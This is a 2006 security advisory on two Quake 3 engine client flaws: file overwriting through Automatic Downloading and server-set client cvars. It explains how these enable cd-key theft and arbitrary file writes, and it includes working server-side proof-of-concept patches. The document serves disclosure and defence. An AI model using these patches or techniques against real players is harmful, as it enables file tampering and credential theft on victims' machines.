####################################################################### Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com http://www.icculus.org/quake3/ Versions: Quake 3 <= 1.32c Icculus.org Quake 3 <= revision 803 other derived projects Games: exist many games which use the Quake 3 engine and probably they are all vulnerable but I'm not able and have no time to test them. An enough complete list of these games is available here: http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine Platforms: Windows, *nix, *BSD, Mac and others Bugs: A] files overwriting through Automatic Downloading B] cvars overwriting with possible information stealing Exploitation: remote, versus client Date: 27 Jun 2006 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Quake 3 engine is the famous game engine developed by id Software (http://www.idsoftware.com) in the far 1999 but is still one of the most used, licensed and played engines. It has been released open source under the GPL license some months ago and now it's mainly maintained by Icculus (http://www.icculus.org/quake3/) although exist many other derived projects. ####################################################################### ======= 2) Bugs ======= -------------------------------------------------- A] files overwriting through Automatic Downloading -------------------------------------------------- The Quake 3 engine supports an option called "Automatic Downloading" which allows the clients to automatically download the PK3 files (maps and mods) available on the server but not locally. This option is disabled by default for security reasons and Icculus Quake 3 is actually the only version of the engine which uses an anti directory traversal check for avoiding the overwriting of system files. Anyway this check can be bypassed through the bug B described in this advisory, so an attacker can overwrite any file in any disk of the computer in which Quake 3 is running. The following is a short description of the mechanism used by the "Auto Downloading" option for downloading a PK3 file from a server: - server sends the list of the checksums and names of the PK3 files currently in use: sv_referencedPaks and sv_referencedPakNames these informations (cvars) are contained in the systemInfo string - the client compares the server's filenames and checksums with its own - every unavailable or different PK3 file is added to the neededpaks buffer using the Q_strcat function (for avoiding possible buffer-overflow vulnerabilities) with the limitation of 64 chars for each filename and the adding of the .pk3 extension to each remote and local filename following the format: @remotename@localname - the client starts to automatically download each file (remotename), saves it (localname) with the temporary .tmp extension and then renames it with the name available in the localname field seen before The usage of Q_strcat allows a malicious server to avoid the adding of the .pk3 extension (needed for security reasons) to the last filename of the neededpaks buffer if the length of 1023 bytes is reached: @remotename.pk3@localname.pk3...@remotename.pk3@localname[.pk3] So the latest .pk3 extension of the local filename is not added if the total length of the string reaches this limit, that's all the bug. The client truncates the filenames at maximum 64 bytes before adding the .pk3 extension so we need to specify some useless files before our target file for reaching the 1023 bytes limit. The result is that a malicious server can overwrite all the files contained in the folder pointed by the fs_homepath cvar of the client or can create new files with any possible extension. By default fs_homepath (where are stored the configuration files, the Punkbuster files and others) is the ~/.q3a folder in Linux and the Quake 3 folder in Windows BUT, as hinted before, we can modify it through the B vulnerability which follows. ------------------------------------------------------- B] cvars overwriting with possible information stealing ------------------------------------------------------- The same string sent by the server containing the sv_referencedPaks and sv_referencedPakNames cvars (variables) described in the previous bug contains also many other cvars which are automatically set on the client when the player joins the server (this is a fixed feature of the engine, cannot be disabled and is not related to the Automatic Downloading feature). Everything is well explained in code/client/cl_parse.c: void CL_SystemInfoChanged( void ) { ... s = systemInfo; while ( s ) { Info_NextPair( &s, key, value ); if ( !key[0] ) { break; } // ehw! if ( !Q_stricmp( key, "fs_game" ) ) { gameSet = qtrue; } Cvar_Set( key, value ); } ... In short is possible to overwrite or create any cvar of the client. The ways for exploiting this bug are a lot: - cd-key stealing through a sv_master1 cvar which points to the attacker's host, the Quake 3 engine sends plain-text cd-keys in the authorization queries so they are ready to be reused - enabling of the Automatic Downloading feature through cl_allowdownload set to 1 - overwriting any file in the system through the fs_homepath cvar and the bug A described in this advisory - many others ####################################################################### =========== 3) The Code =========== The proof-of-concept consists in a small modification of the server. The following are the two diff files for overwriting the client's file baseq3/games.log in the c: folder, remember to create a file called bad.txt in the server's Quake 3 folder containing the data to put in the target client's file. Keep in mind that this PoC is really very basic and not so optimized, it's just a quick and simple demonstration of the effects of both the bugs at the same time. Remember also to enable the "Automatic Downloading" option on the client for testing the bug A. Enter in the Quake 3 source folder (like /tmp/quake3, the patches have been created on the revision 810 of Icculus Quake 3) and type: patch -p0 < sv_client.diff patch -p0 < sv_init.diff sv_client.diff: --- code/server/sv_client.c +++ code/server/sv_client.c @@ -714,6 +714,11 @@ // Find out if we are done. A zero-length block indicates EOF if (cl->downloadBlockSize[cl->downloadClientBlock % MAX_DOWNLOAD_WINDOW] == 0) { Com_Printf( "clientDownload: %d : file \"%s\" completed\n", cl - svs.clients, cl->downloadName ); + if(memcmp(cl->downloadName, "none_", 5)) { + cl->state = CS_ZOMBIE; + SV_DropClient( cl, "disconnected" ); + Com_Printf( "Malicious file sent to the client, connection closed\n" ); + } SV_CloseDownload( cl ); return; } @@ -765,6 +770,13 @@ return; // Nothing being downloaded if (!cl->download) { + if(!memcmp(cl->downloadName, "none_", 5)) { + cl->downloadSize = 0; + } else { + cl->downloadSize = FS_SV_FOpenFileRead( "bad.txt", &cl->download); + } + unreferenced = 0; + goto letsgo; // Chop off filename extension. Com_sprintf(pakbuf, sizeof(pakbuf), "%s", cl->downloadName); pakptr = Q_strrchr(pakbuf, '.'); @@ -845,6 +857,7 @@ return; } +letsgo: Com_Printf( "clientDownload: %d : beginning \"%s\"\n", cl - svs.clients, cl->downloadName ); // Init sv_init.diff: --- code/server/sv_init.c +++ code/server/sv_init.c @@ -533,9 +533,21 @@ // the server sends these to the clients so they can figure // out which pk3s should be auto-downloaded p = FS_ReferencedPakChecksums(); + int timeint = time(NULL); + sprintf(p, + "%i %i %i %i %i %i %i %i", + timeint + 1, timeint + 2, timeint + 3, timeint + 4, + timeint + 5, timeint + 6, timeint + 7, timeint + 8); Cvar_Set( "sv_referencedPaks", p ); p = FS_ReferencedPakNames(); + sprintf(p, + "none_%059i none_%059i none_%059i none_%059i " + "none_%059i none_%059i none_%059i " + "baseq3/games.log___________________", + timeint + 1, timeint + 2, timeint + 3, timeint + 4, + timeint + 5, timeint + 6, timeint + 7); Cvar_Set( "sv_referencedPakNames", p ); + Cvar_Set( "fs_homepath", "c:" ); // or /tmp/ or .. (NO backslash) // save systeminfo and serverinfo strings Q_strncpyz( systemInfo, Cvar_InfoString_Big( CVAR_SYSTEMINFO ), sizeof( systemInfo ) ); @@ -596,6 +608,7 @@ Cvar_Get ("sv_pakNames", "", CVAR_SYSTEMINFO | CVAR_ROM ); Cvar_Get ("sv_referencedPaks", "", CVAR_SYSTEMINFO | CVAR_ROM ); Cvar_Get ("sv_referencedPakNames", "", CVAR_SYSTEMINFO | CVAR_ROM ); + Cvar_Get ("fs_homepath", "", CVAR_SYSTEMINFO | CVAR_ROM ); // server vars sv_rconPassword = Cvar_Get ("rconPassword", "", CVAR_TEMP ); ####################################################################### ====== 4) Fix ====== Bug A has been fixed in Icculus Quake 3 version 804 but keep in mind that the "Automatic Downloading" feature should be NEVER enabled. Actually no fix is available for bug B. ####################################################################### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org